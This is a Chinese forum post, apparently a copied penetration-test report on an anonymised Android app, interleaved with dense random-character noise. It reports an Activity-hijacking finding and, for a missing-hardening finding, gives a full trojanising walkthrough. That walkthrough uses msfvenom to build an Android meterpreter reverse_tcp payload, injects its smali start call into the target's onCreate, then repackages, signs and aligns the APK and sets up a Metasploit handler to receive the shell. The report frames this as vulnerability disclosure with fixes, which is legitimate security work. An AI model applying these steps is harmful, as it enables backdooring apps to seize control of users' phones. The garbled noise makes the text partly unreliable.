- W( x+ L4 s9 ]( z5 y5 }. g5 K 		5 C: Z7 h* Z) Z6 S) V: G - S1 |' p( Z( I" x9 b& H

1 {2 L, v# C! W4 B9 v ' x5 j! b, m+ w5 n" J5 V% E   5 j: A7 s ?4 ^! M! n 4 Z& P# v5 g3 A' a

% w0 u" x; u. \0 n 9 I2 U2 N4 |1 o7 B! R9 W0 C
1 B- o4 |. M* ?! U0 a ) p3 R$ h L! ?7 f% Z
6 C2 U: Z" s" d3 {) c* C8 j ) y" m6 Y% @/ U

% w n7 \& _2 t7 k * R$ J& T, _: A   1 s6 b5 Y1 o5 n% f7 D 6 {3 P0 B) h1 `3 o; ~! C4 B

1 _- W2 G' v4 A/ x) s ( L- m7 r0 c4 y

% f& v, N9 y' t x& X7 g# y n3 z& q, X9 V; a& q 1-2 测试结果 # r) V U4 T/ a; f- ^* k: V+ ?, }) P# N' _7 g0 c; r$ s# O5 M( D9 {: N

4 c3 S8 r3 M# Q+ `+ E! f) C5 C% j& p2 l, X8 C( ?

8 P) ~0 J' N; l% C T2 L h; G+ ^6 k$ }   3 Y N8 _% Y; D$ U2 ~- ^; k 9 y& {) ^+ J! k8 Y, G8 R8 [' u

- D5 K/ ^5 r; G% G+ C8 D8 Y; k5 t4 o0 e8 `1 k

( d* j4 M% f) | * A' r6 \( z6 g' C 2 检测结果                    3 ?6 Z; w) }/ h& }/ G# `2 a! [: M2 F " ?! Q N# I* m& n. R

7 d6 w" e6 h; M1 g1 ?* c* z! ]2 ~( t7 p

2 z, |9 _% c/ s; B+ X1 P % v0 `" H; N/ Y2 P7 n. z 2.1 某某某 + N$ O! l4 D5 {6 C) d4 }; |) ^6 c+ A

3 u5 e( B* h c+ ]2 ?" O8 A: ], g

) \" ?. v, b$ x) D / L0 f; {$ I9 B; q' h0 r# F4 f: k 2.1.1检测目标 ) w7 o* {& o1 ]1 D4 q " x0 M0 N" M8 m2 C. o

/ y) W" R z, q4 L& E) N/ y% } 2 o( _+ L, T" {

; r1 j2 y% |( R, h8 B9 N H) N5 H* g% T6 T+ |$ c5 {/ x9 M 目标地址: 某某某某某某APP 6 z- B: U( p! } v$ ] ( ~7 Z: ]" T" ]! H

. u. l2 k9 ~/ s( c$ l X. L) f3 E( ~/ _2 L

/ v9 [, E6 L& A, l1 u# F# L3 z ! p$ k6 G0 |! q9 R- C/ h* d 2.1.2检测结果 3 N0 e) J* [4 k1 d 0 a H! u! p! B( D. y/ Y$ q: E

. e9 O- b, K/ B) R) \ r) `4 J. D0 e$ R, V

" v! ^5 }9 R+ L( v. e1 Y " T3 k4 Z/ `8 j5 ^ 2.1.2.1 " ~9 |; @: @- `: S8 ]' t9 W" v/ M7 W * K2 j* d# C/ T

' D& z3 L, K' @- G" R' D! [/ T7 p) F# J5 a: Y/ `6 [! {4 r9 n) R: ~

0 q: l. _5 Q0 N5 i6 |. W2 q! T: H( S( ~ 漏洞链接地址:某某某某某某APP 8 b( e0 k: k( x& r {9 \ : y8 D! B" r- G* {8 C$ z

: R0 |+ y% n9 b2 j S: K4 }: d0 b% ~+ u( @

( d. h. ]. q! _ ' i. e% R& P2 l* r* u6 M   * z9 b l- L0 @ L/ h( f+ }" G% ^ 3 c/ J7 j( J6 q1 j# A: a% E( v: x

+ ~* l* j2 M' f# J d" x& Z9 E8 F( Z! j* p- M# r5 C6 o

1 P) ]; N p. E# x' [9 n8 r1 m ) C& b0 {: O" G- K4 E 漏洞分析及取证: ( J( G9 @, q3 c$ ?3 v 2 q; O3 [2 y( r7 b2 I. o

+ b* }6 S& Z6 {- R2 m! }* _0 u0 d+ y, e( `8 F7 g9 q

! ~% B3 l$ C4 a5 k8 ~; I ! o6 Z% E1 M' G4 b% R, M8 X8 s                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: + j1 k, N) ^7 h3 {3 L' q/ e3 y- ~+ v0 v* W# }% k* _

- l: f, Z& ~0 ]! p/ K. ~ " o* {3 N) w# A i" ]* I$ V

. y# v) O* R' v' T1 D: A3 S! V / }. ~$ f; x, z% L0 k; I      4 l1 G) _! R8 G7 `, l& f8 y0 Z* J8 w3 L' x

0 A8 D. f+ e1 C. _8 `* X + x6 V1 D$ o1 O

8 u# @! U$ O# T3 o0 Y 0 `0 p" ^ N( p. v; I% X4 y                       8 W7 P3 `, i4 G: l+ q" |' \: L" k! k7 |% v& O% _/ \! N' h* G6 f

: R2 k% R! E2 C8 Q8 e8 P* ?$ I . J4 R* G3 C: J9 O

4 w6 }, G# `- N! Y + X! n! A9 G# n v& G+ F 3 @3 T" ~$ i' Z# v. u! `& A8 K% K; ?# C c t

6 K2 D. m/ j/ r3 M* j" O& K1 H- N% y( r: T

9 R5 Q7 h) o9 p# H. z1 J ! D: S" l: I7 X1 e$ A/ s4 P, n # T7 ?' {7 C ?! S6 T, t * T1 j0 g. P/ ]+ ~2 A+ B

& e4 N% E* S: W9 L$ @9 x$ c. J $ u9 n3 [+ |( t4 ~

# Y! w% Z! Q3 ^; |# f 0 h7 j$ k9 P1 t1 f0 [ , O' D k+ Q7 m, F( R0 y E" Z* J: l/ _- T" Z% p3 ?

" c: f8 H. s: M7 o& Y & c9 u) k" D. c6 | l

6 c4 |( t, l5 B7 [" u 5 i8 K1 q- A' O& B 漏洞危害:高 + W+ _) l3 r) d& ^: b# M( }6 X- m 7 f' T: j7 t& {+ V- \: C* h; z

% v6 k! h5 b$ f6 d' ~ , L3 x6 H6 `1 D4 ?7 _
; X0 g% b7 A4 X' k) B( q | ) S z0 U1 N* m 2 ]1 g( {- v, b* U D: w: y$ I: ~# {) I/ m) i" D" g( _2 U) O9 `$ w1 ]& _! r- M* _( l1 o7 O8 A5 `+ v: n% F& ^: K4 V7 V- t5 I7 i% ^! b4 S( w2 Q( ] k% j0 d9 [$ }) u$ _: L [9 k' o1 S+ G X! V' v' Y( R0 M# g$ ^4 e9 X1 h- [! m! g" _8 k9 p2 d( o4 @) y. [1 v7 @8 g2 |2 f5 H3 Y) E7 F8 w9 V1 W: R( u- f3 U& `) r9 |# R5 t) ?% }* L m( g. e- O8 D7 q" e" ?" I6 X8 Z' A- ]( O$ }8 U; D/ |! @& Y p' \$ {2 i G' q/ n0 R! Y# c* [$ h: c V0 ^' d) S! }& A( s8 |$ {2 d( ]0 o2 s* l( X1 e8 K: o* x2 v1 b3 R2 N" N# ~1 R$ C, I2 @( u5 m5 }7 j! R: j2 E. a& B# e0 ]! V7 U0 v5 ]
5 W: N( o8 t* ~0 x 1 c4 l. I* |+ `! d

( T& G: q) s1 R0 I* F 2 d( G7 D5 e/ I' V7 @8 e4 i 严重程度 / q- v6 H( |( U% C6 o$ ^ 7 |4 \% m5 Z5 P @: F

% J' _, c2 y: [7 Y7 t9 C - _. r; D; B' t, l' Y0 |+ r 		5 g2 X& x4 @! W, ~/ k1 A# p . V7 e7 o( `4 ^3 ^( K

4 V: y7 b) G0 G Q, z % B. Q r; G' P( |/ X: N7 z3 ]1 w : r7 v8 i9 r b& X! D" D 7 Z: y4 ]2 Q5 x: a9 V( C! k9 @

( G4 m2 A" U; n3 ^9 C9 h5 U1 j/ q" d 		6 a l0 S5 D) ?9 T* p } ! `) \" |! _1 D) p

4 ^( h9 e% ^) i) G i 8 a' c( S/ m N3 A2 J $ I5 {! V" O/ Y0 n' K5 g# N1 Q0 K+ k! j& J

) U: v9 J( k0 A1 O4 x: N+ a; B4 U# b, j+ t$ C3 p" ^4 ? 		% y5 Z0 P: {: B) A8 }, \ f# E" }: N3 j7 E

5 U4 @+ \6 M) i6 f/ i # y: p' w5 @# s, [, x5 s0 [ | / s/ Q7 h. x* W( t Q, o 5 g, V7 x1 b; Q+ o: B

% p5 O# B" A+ k+ b7 S$ ?. W, E& X $ E {* \: i" F 		7 w& i% }6 ~6 k$ q7 |) w- X0 U( ?# Y |6 N6 ~6 S9 d* R

" }9 D4 _8 s+ Z- c$ j , U& M$ @7 } I% v! u/ S) F3 M   , f6 h; Q4 e5 h, E) Y) Y- s$ K# e5 @" k, Z

7 f+ i7 f/ t2 Z0 c , Z4 y Y' o2 C6 i; n/ @0 e 		) `3 r0 v; b# u2 S7 m F $ b( z! B) A5 c7 m# @

5 y* N: v) F( e ) r) a6 z) O/ H8 ~2 A : N) [" \" {8 p/ U0 b) T% f6 P' s% C9 { v

% y* I0 N ?- ~. z: f- {& W$ _! E9 U 8 d* U" z! z! Q5 R# F; d' D( _ 		0 w; @7 s! W0 u* w b- {) e# q8 r1 N , W, Y9 Y- w* J7 S s

: F0 b; A2 f3 L8 ]+ p I1 \" E" `" R+ t5 S# T   3 }/ E9 P6 I9 c2 l) h+ u- |7 X' I% l

" ?3 f8 `! L) |- m) B( j$ Q 3 C: P5 O \7 F: G
2 N/ K7 T8 b, x% w6 ?% {: G2 T- J: o) ^, e' v& S6 k- d& ~& h
" l6 [6 W' ^6 ~# g8 Z ! |) X# s1 K, s! {0 F! s. L

v% |/ R7 L- ]& f0 @ ' h$ \, I) x: `   1 [" o/ A: v* n6 a2 Q % v' ~7 l3 n0 h- D; h* K+ M

, P8 n8 ]; _. F$ K ' o) l7 q5 W2 W

, c" O3 n! I6 ?% l5 r A 9 I5 R/ O. p+ Q0 t$ V 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ! h" N* N: B- J5 r9 [) j& @' J 8 I# d! d: a* _! s

# E g. q4 f3 W3 l R3 a+ N - O$ R0 W1 r' `% ? F) Q2 k8 B) m& J$ n( P, ^

* _) ~. z3 `8 t! T1 c! y6 F/ r# y" R2 j1 }           ( y7 S6 p. f" X- v8 u% O 3 ~# z2 \8 g& ~ @$ @; @% Z' J- N

& M7 n9 W7 L, c# |+ L/ R! S Y# R# f5 G5 v+ h8 l* p2 b/ N

6 p3 y; g# s% e/ r. H$ R ; C5 h) F8 z% q# b   4 y: P, R: \" v( d0 D! y' `8 K2 S {

C2 J4 x }5 [: {: m# p4 W E! I- }( \6 H- M( G* ?

6 I! n9 [9 L* a2 f; o3 g% P! v1 }) I 7 U3 R: V9 O [, d 2.1.2.2 : }8 D% n; J( l * T- P# ?2 k/ _/ k: O! m) ]6 f

9 C9 r9 J. m( A+ M. @* _ * i1 e- R, M# y- \5 w" i, X% c

, y" j* d7 r7 p& G7 k7 X- ~0 k % l! F- e* q9 M" Y1 {. Y! I 漏洞链接地址:某某某某某某APP % K5 a; k F: k$ }. p3 J5 i, q0 @0 J+ f" k9 A- }

! w, S, z) H) o- t v% X" ? ) o/ p s' Z' l& u

9 [4 ^, \9 ~1 ^+ l* }9 v2 i : y/ q% n$ F# P1 T# F3 V0 H 漏洞分析及取证: 6 L( m7 D7 J! P! ~+ ] 7 U( u! L8 X2 I3 i; f7 w

0 ]; I y& A+ ]* f% A; i % [2 J3 p+ l4 Y D

) C ^" Y2 |/ b) \% Q % o# S5 r5 r- Q8 y; Q! b& U6 |                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: # Z3 C7 }, D' J' M4 c( C4 M; Z$ t% _: e! T$ N: W

, a2 C. o, W$ ]. ?, g : o: }& ?! ^2 a/ }- @- x9 o! E4 S

! f- j' q: Q4 | ) X0 X' t% x- I& L1 D9 {+ q' J5 j! B Metasploit 生成木马 apk % r8 |, E# \$ @4 a+ `# H / J, N9 b2 S" Z! c

0 ^4 y! C, B* {- B& P4 t + U9 G( `3 \, ?0 z, r7 {. O7 M5 N

4 g3 Y" z' o5 R 7 Q/ z" G3 O4 e( {3 i, ~ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk , Z- O |% M! C1 Z7 f# G l1 l8 Z; t5 z/ h

5 N6 Q9 E' A# t7 I/ {" p: k * [0 G) E! H1 t# [/ {

6 @. s2 C# X8 G) H n 6 `) r7 M: Z, W 反编译目标apk和木马apk ! U) G, M' Q8 R/ g& h/ D/ Y8 \' n

( l0 u% R/ x1 K; G# e) E" g- o 7 n/ i+ {- ~ o* u2 S

2 V; x' a/ A5 `! D ; Q3 C( v: T4 A; s$ O apktool d target.apk
+ Q( q# x9 c+ b- { 8 \' N9 F* f3 G e: b apktool d cockhorse.apk - @; e+ k4 j: U- F k) k1 _ / |$ w% |& ?0 n" _0 ~6 P$ Q$ B

: H0 M0 g' N( r3 K 0 D5 A) i! E+ i

; h% t1 U; X6 a9 i : `, `1 a6 k0 A 木马 apk 注入目标 apk ; j c4 N! u* @4 Y2 {* j% i# ]' w8 {6 ^4 F1 A: Z0 a- k" [

2 |8 y2 B) h# f, I1 ~ - W2 a5 X! H1 ?3 E

7 ?$ L! i6 Y- `2 d# ?+ R' v3 w # M$ A; K8 f( L 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
" I- j/ x) ~; Y( p - m5 Z0 N. m+ J1 s invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 9 T- [" T e& _- `" B/ A8 z$ L; P# v; ?: Z1 Q* `% ]

5 {+ O0 V. N$ N 8 T; n% i) j, W; E- v& | u* O# J

, D9 ?) d+ t9 D: a# }/ n4 }/ H! d' {; ?$ f; x 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 4 p) p: c; @% Y1 [8 J5 H , ]8 }( u: `/ j: ?1 o! v

1 F$ ?9 [6 D W" y0 ^ r9 G/ g & Y6 ~3 e( z; k4 j6 v

5 }; ?) D: Z$ p, ?( r* j % E9 `5 y0 w6 y/ c Y4 b: X 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 3 M" K- ]4 h" N, W. e- p- o% A4 t! T/ r

+ g( S$ s6 _; R% J% h$ a \; m! e J' A0 o* Z! d, V; g* ~% ]

& j+ R1 T; K+ B( o 3 `& X3 W7 P9 }. h0 a( Q 回编译生成最终 apk $ P" O$ p9 A6 E4 r. R3 C ; y6 \$ I' b& T2 d

5 X2 e' E* f6 l+ |$ i b2 h # F3 y8 g& V( f; D$ c

2 s m, U* F! U) u+ \" v- b# J: G& g* }' p0 A6 p 重新打包 ( o. Q$ t& t2 q. e4 k- q0 J; B9 ]; o7 H/ m4 M

, ?' H; S# J" q. S1 |3 |/ D4 M# ?2 B* W; H) h) q8 V" @6 b: v/ U

2 T3 J# i! T! X' J( |# X8 s# x& i% n- k* q) q. i apktool b -o repackage.apk target_app_floder # V$ h) p# I' a' Y8 K; y* I% A ( ~9 b: \- f. _7 r3 q/ F

. `4 _/ \" s) J4 O% u& v/ M & b% X$ {. K& C: w( j; j

( c; K/ D1 |+ Z* z % Y8 Q0 f/ K d* G' h% O2 M2 l 创建签名文件,有的话可忽略此步骤 $ N6 t c- v$ f' x& ?5 w! p+ f4 S8 y

5 p8 z$ F3 D7 K; @0 ]- r # S b2 { L# k5 q; J! `, |

6 t! h0 }" I7 Q% b2 A7 J7 q; n, G6 i" Q keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                " M! O' L. x1 f9 Z / Z- ?/ ]3 X& z# G# H- D. h- Z

8 {/ _: f% z; K1 E7 E5 y! L$ K d) x% O( H' N) P2 n! @* r6 U- P) _

. J# m1 g) {- w0 j0 X7 A2 L/ P' p' s) s+ e 签名,以下任选其一 6 [! H$ x! ]: Q8 F $ g% d- e- K* \6 R4 Y" ~

" s+ p4 G3 k, |+ t/ K3 ^) ~4 K* n; `( @; I1 |) i* g2 i

% l* L+ f# k2 ?* D* W ( t5 r0 N; ?2 r* ^2 [" T jarsigner 方式 9 r7 i$ a0 W1 ?/ N+ x7 l" r , W( C7 G; V* c- S- Z/ J" H$ X

$ u+ k1 I6 ~' s* ]; O . u5 y) X8 r% E- o

' q4 q5 H! J0 l$ H& b7 n5 ~, d" G& J5 e' k; W* U/ B$ X# y jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ' l6 C! `6 d4 O6 X5 u7 w3 y/ b4 _' N, ?/ K, D1 |7 N, t, n1 y' S2 M

2 a* N) Y& o& W ' D7 A w( C$ d% r9 G+ |3 P

" e6 B! F4 I0 O9 S4 n4 u- r) }' e7 z0 t. U0 O6 h. k apksigner 方式 ; O& N5 w; ^8 v+ x) E8 w * O* w1 U% U2 n8 m

( W4 [+ _; Y! S8 ` ; C! ?: z6 P' N2 g0 J

" A f7 Z6 G1 t( r0 J6 _ 0 C# i ` C4 b. o! Y apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk X0 ?& @: H" @3 q/ n' u5 l+ v; B5 J

/ r6 ^2 i( Z% B; J3 f - E |& }, L: I2 ^ D+ O3 I

8 d/ T$ y3 P2 b5 s: i8 |+ ^: d' W; y 如需要禁用 v2签名 添加选项--v2-signing-enabled false * _' ~9 ~# ~! z8 n9 g( G+ w0 [& w( E: I& w% x

1 ?# u3 |8 }, n) k1 e" c+ h3 Y$ H 7 }$ t+ ^: w7 R

% ?7 f7 {8 U5 x; d9 p: v 0 E- p+ Y' g+ y! Y! u 验证,以下任选其一 0 f1 z2 W% u! h( q5 x ! T4 `( \* v8 ]* D, e

+ ]( |# W) P4 L7 ]" }! ` : c' M' W. P3 n0 g9 e- q: Z

( D8 {, p# ], [% n' C ( h+ W! S" P) N$ H+ U9 B7 ]& q9 o jarsigner方式 3 I8 p! W. Q! h ) ^# Z9 d: i* }: u* R+ R3 C

) q! `% ?, k: n, U6 W0 a% d ' L; U) F7 a( J% p

, _5 s- P$ I% s$ ?# D- p4 u 2 W, l, ]" T" F4 j jarsigner -verify repackaged.apk 3 a4 [; x: b5 w* ?; {9 t - x, j9 _% H1 R9 e; I7 M0 K

$ G) z# b, m+ H' `# F 1 K# H a8 ?7 @' l; z% b2 v$ t% S

3 W2 A5 m8 T4 y: \$ C1 T& S7 Z2 |8 Z0 w 1 L. D# s3 a" u5 P4 D/ R apksigner 方式 / ]) W K2 `7 x" y % {1 ^0 D8 l w- f% q! h8 m2 ?9 H1 X

! P/ U- E$ x1 F% d {7 Z& V + Y" n8 @* l+ O, X8 o( u) X

8 ]2 J: a( r$ o9 E1 e% [2 |! J/ l8 m* ^ % E8 ]3 G4 B0 W) j apksigner verify -v --print-certs repackaged.apk * Q. h5 d3 ~7 z( H- V$ `: e$ E 5 J' S- M; ~: o7 q, N3 K

1 M: K' `# h/ X" A8 [$ ~- n2 q- H5 r: ]

- i/ V; l; \5 K7 E5 t' }$ H" F. g- f, ]* v keytool方式 . ~$ H2 B* Z9 R3 g. q: i8 x; S! c ! {. U6 I) l( @1 n7 E' A- [. ] E

/ D- o/ V( n- F ? 0 M; M$ W. ~- L9 v1 ^

" G+ C: N! D6 y& W+ b% K6 B a ; R9 y* w0 e$ v4 a keytool -printcert -jarfile repackaged.apk . ]# C4 ~% g: C6 ~" i. I" V ; M' k' p/ F% G3 k |5 @/ m1 Z6 Z

/ l% Y3 A: f4 b- r . p8 E6 Z6 X, p7 S( H1 h& |! X

! L! X' r6 ]2 @1 A( \& r, H+ g% p8 x 对齐 % o# w5 D/ J4 p+ K3 Z' z 0 E( [+ [+ N9 i5 s- M1 e

& f4 n% s. g6 y( T- Z x5 X" M# P1 R5 C5 B0 u" M

' w- l7 G/ R5 N# \1 p ; e" b9 e* K. _5 i8 A 字节对齐优化 ' g& k2 n. \; b, G ) s# P: D. Z3 _

$ [! b: o; t9 a/ g9 g6 |- c3 i% ~5 W ' k8 R( Y& V" M4 x* ~, w

. P$ I2 o" R: G6 \# e# p( G& N9 s5 y 1 \5 y- X; Z% l) K zipalign -v 4 repackaged.apk final.apk . e, r; M& R! U9 F" [7 j6 J# R ( W/ [; T2 x u; s2 o; o+ r' b

( B# _4 m8 d" A/ X3 A9 U & `1 `1 P* X8 D8 V' W! @1 P

; N& R1 r: _1 T7 C+ q $ T' l8 y2 B- v, o3 X 检查是否对齐 & N- [8 N, T2 p: H& D1 { 0 w# g9 I: N% |" @

& y. o' y( w$ P1 ` $ m/ i$ f( X% {4 S: U; I

8 o8 }& z3 W4 B. h0 o" { $ U& \" a' e* w5 o* | zipalign -c -v 4 final.apk 1 P0 ~& E" \% S4 T0 m8 X1 A! G9 t& N: r8 @9 ?8 I- w

/ G7 d8 v( L h+ v8 I) c+ J * T) X$ O" E0 _$ i

9 e6 P- y8 O [" N& s$ Q6 z " _) E( Z% Z: l9 v7 a 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 , r F- k! L1 f3 O Y$ s . W" ~& l2 r+ ^3 j

% Z7 W) O( s% w; @" A, H% X. ^& z: r% B2 t3 K5 ?( b

! t2 ]# c8 _7 @! W ! x. d9 q% G- g4 ?, G% U: M 启动Metasploit控制台,配置参数等待上线 t* y$ j) P: g7 N7 b6 V9 s1 p3 U+ c/ p

! ^( w7 r6 O* [! L6 }0 {+ }) R' R* |" r; ]5 P9 P+ E( h: \

+ L" y" v& S- G! a 1 q" x, U- r9 w$ z& l1 V 在终端依次输入如下命令 7 E y- o$ V4 M: e, Y 7 m, o% T: c) k9 b

) P( A! V6 s5 z8 @ " v E' l; s- C& `

+ b" S& M3 O5 K) G- u6 j% K4 v $ c! ]! Q: m. ~$ [( g3 i J msfconsole 5 u( q! {# C3 \; z1 l% I , Q- f9 A$ m' _9 p0 ? {* L

" C8 h3 H3 M0 W4 l9 D3 [/ P ! J P0 d2 }' B- r. w# X7 y

( p3 q+ [1 M2 [) L* \ : h" l( L+ T! @, V. h2 n5 { x use exploit/multi/handler - Y0 H) W7 v( b# { 9 _+ z" h2 K3 q# Y# i+ q! [# j

' }$ f) R1 z* H+ V1 D5 B 7 A) y1 s0 N# a6 e: B

& q9 \: d9 O4 B: k2 N# x" B 1 M; \) T3 y# E+ _ set PAYLOAD android/meterpreter/reverse_tcp ) C% w6 w3 U+ A$ y & l$ l- ~0 F2 U& v. `, \5 B' b1 [; G

/ N: m( ~1 M0 l+ m8 o% O& [; ?% Q2 m6 W- ?! I6 }! D

* J0 N0 ^" D8 r# m : f- V# a* ^9 s0 ]5 y& V% u, \4 a6 o7 F set LHOST 192.xxx.xx.xx / O+ O# H2 p$ A3 | 1 b% j. z/ f" z4 {. B: b9 I/ s

6 n+ M7 P5 K8 G4 L + E2 r Y3 k$ ]. |0 R2 t

- U' ^% |' l, n5 u' y, H6 o( j! l l1 u: W+ O$ { set LPORT 4444 " I! }( c' I5 ~3 S : b, ?* l( c. v6 v2 L

* T# l! s: J5 |/ n 1 B* d- n6 J2 l; i+ _1 j% f1 L

* k* P0 ]/ ^: I) j / S" @, d1 O0 F \ exploit ! X1 |" A, b3 C0 ] H; R5 ]' J* u) v j2 V4 F0 X& o

# A! W) m( @% N/ W) G" q - l( z3 W* P- Q e% C0 ~. R

1 W( ]% f% b/ o$ h9 b- E: {+ h9 v 4 \5 j* R, U& \ 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               ! @' ~ W4 Z7 P* T6 x$ `& p% A2 j7 [

0 m) Y% ~ m4 \0 p q( j # s! c( N z" V. e7 M

' o$ \( b0 `& k- p" n 0 \6 m8 P- s8 |! k8 Q 漏洞危害:中 & v! `1 y0 A4 N1 R5 j" ?5 w0 _- S " Z0 V; u4 ~' L, q1 S" @ h0 X

* x. d' p, z1 S& A% ]4 @: s1 G: c0 M" f! Q/ Y1 h
4 f1 g; b k; b& n1 ` Q! ?: o& m. D & S/ g& g7 j# s8 O7 v + x K0 B% r& O5 P$ L% W! R ! d2 u& r( I3 o; g , b# N, j5 Z: i, Z8 y' }9 ^* s4 j( @* A, B8 v. E6 L& F- E: U7 q! l6 Q n i$ C' ]( _% {8 Z5 Q4 s# W8 c1 Q$ Z/ y8 {$ Q" g- u6 m* n5 Q, r3 y1 [1 ?; c1 L. m* ?) P- {1 {9 a" _# T7 P* M* h: ?. n3 K9 u9 c4 T3 I1 a5 f0 s" F' b$ q6 }" U* B, C$ ? D1 H/ m& R. I; N; H0 x# d! ^4 ^" ^" J; q0 ]- I8 A/ M/ O3 o8 a+ |5 q7 d; S& p& q0 t, N; T: X, D; P4 g7 ], G" Y+ R: @6 q* D) L+ Q( X4 g6 n9 k3 }' ~7 C p+ q X' Y; l2 Z* v- Q0 ]! `3 e( ]# D q# o& q, M( a! [$ T% R4 G. l) T! X/ N; N7 e* j' O- l+ T8 e# p% a; T8 X+ _- i$ W% Q7 P# W! v, D" H4 i3 y" F; w( |5 i- I
0 T, M9 d7 U* @; e( E" _ $ n& q. K% O _2 D; w F

. C5 V! m; m( t4 _$ u & l* a0 T4 [" g: W8 y6 l 严重程度 : [5 b; R b6 Y/ c6 I! O: ] 8 W7 B" ]2 V" `; ^9 T. @0 q" C: k

* p8 k! a# P; D6 A% j/ F 2 g8 s; w. J( Y: t g# R W 		, S6 R( F# Q& r8 z9 ^4 j- X y% `' r& L6 n0 p! [- n0 _

|/ e' c L5 j9 t& K % l6 ]2 w, G2 ]4 d, p+ Z 5 r. M- ~. L" c* m8 D( F% M3 H9 {/ U `

[" ^- R3 V- R; Y6 f& [/ K. @9 _* Q 		0 B2 n; A( k* y( R 6 e7 B: L) w* F. y: ?, Y i$ g1 s

0 p1 y: l" M' k8 G: W' d; e5 |+ d 9 y; \- d" J. ]6 W) Q) C0 f ( A$ O F3 _+ A' A6 s4 T6 `* ^9 x5 E " U2 {; N: e/ g3 @6 F; h! W

; t/ I; K/ z% W. m $ d7 `* N; S- [, [% H 		, V4 P: M6 |% h8 J5 O+ X* n ( B/ Q2 l8 @. O/ Y H# H% G; k

: V. r6 [# V" J4 ~5 S4 m' o / I# W0 P6 C- T" v , i0 {/ ]) M# P9 q ! l7 i- \' N6 `5 c( L4 x3 N

: w* ~% U# S1 g, K* H1 f . r9 I7 v3 H2 l2 r e) Y" Q 		- X( H* n. b8 u- N- D U. F- I, v3 y6 I- b: o' X; N/ I4 S % {. j J3 a1 g8 J. {( `9 t: B5 U6 s& d" o4 M5 @$ j6 |

/ [$ d* t8 h2 Q9 d* B ( j3 I6 d' R5 X j* I   ! W& H) y+ P: X! ?9 ]1 N* L8 P ' h& Z$ P) A- A; J- {" n$ @

5 s% r, t. \; ]0 X0 d. `( }+ a ( U, r5 A/ h: h/ r' _8 J 		" a8 D$ v5 z0 _: W5 `' r. J- P* ~) w- ?9 X

1 c A# ^. ~0 |- d) D2 R 0 t8 _2 u! I7 Y- x2 ^ s % Q( Q7 a" f5 O: s0 k8 o) X( |8 q1 L8 D7 \5 p

' @6 Z/ l" c2 s & Y+ F7 F, ~ N% z 		+ y9 m% C# [ s$ x+ w! h. g) r8 j% W" Q( N 3 _4 m2 t) p3 L" [! W/ v 4 K: _- U3 |) G+ k. `- W# q' U8 w

, L! x6 s' a2 T; z3 V% N% |& I- N* D9 B   # r" m& V9 x. |5 M9 @; e2 G; j& ^8 N 7 p8 b% S4 A( o% u/ V* d u

4 p4 Z y9 r8 m( y4 ~' P9 E# X, Z0 E3 Q% {8 {
0 d% E+ p* c! H/ E' [1 R% E3 w: R, k, J
; f7 X4 A( Q# ~$ t8 f0 I 0 Q( L! s: u& q$ I% t

5 \( c. p' ^, {" `7 N + H6 ?/ N6 L* g4 l! j9 a   : |0 d6 @! {6 Q3 J4 q6 l" J . |5 _' L2 u3 y; J$ G5 e

3 ^, j9 n4 I( u8 z 2 ?7 W2 G; O1 j5 I8 i4 _' }2 ^ ~

0 c- m' s# K8 B& P) H ) K4 O7 X; Q! S! K; R 修复方法: 8 P& m% V1 c6 q1 _; }) ]) }8 U- x' D |; {! V& p* i2 j# _0 y

7 y) {8 S6 f1 V( A8 u& q3 c: E4 m! v* f ( d+ T' _# f0 F' A# G& K

0 V; _; \ h$ I% |1 Q 0 l# K3 u) F( X' K; ?' m( W3 M3 _* R               1. APP 启动时应做签名校验防止二次打包。
+ W: y* [, n* _% d5 C3 Z& w- `) [) W0 W. l7 Y% ]$ u! i 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ! L, P6 l9 C0 V 5 M& W7 d6 [& d* F5 J# D

: K, D9 c/ l+ w* \$ k6 h) T6 T % Y% v, k! F" f- Q: b! N4 b- V u) @ 9 \/ N1 j/ g9 K7 Q4 K: ~# x3 a 0 a. g3 O8 Y" C+ V3 u. j, F

7 M" N8 |* F$ ]: B ; w. {" H! Z5 S0 e; i _   + P8 O7 ]& u4 Q' ?& z ) |8 g# `& Z4 s' i T1 j( H

/ H! A9 N8 C. z9 u + Q7 i! H( U6 W( Z6 R+ L' h" I # e a. Q2 u- Q, t 7 _0 S+ u# B4 T- A

/ @9 U" a- M0 e 4 z/ [/ L2 Y" I# V
2 }# B3 ~ b$ Y3 }' x& ] ! x- j* {% S. v) W

4 v: o+ I9 L3 c8 v8 d ; T9 q+ m0 g6 f) ]" ?8 y1 a1 X
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表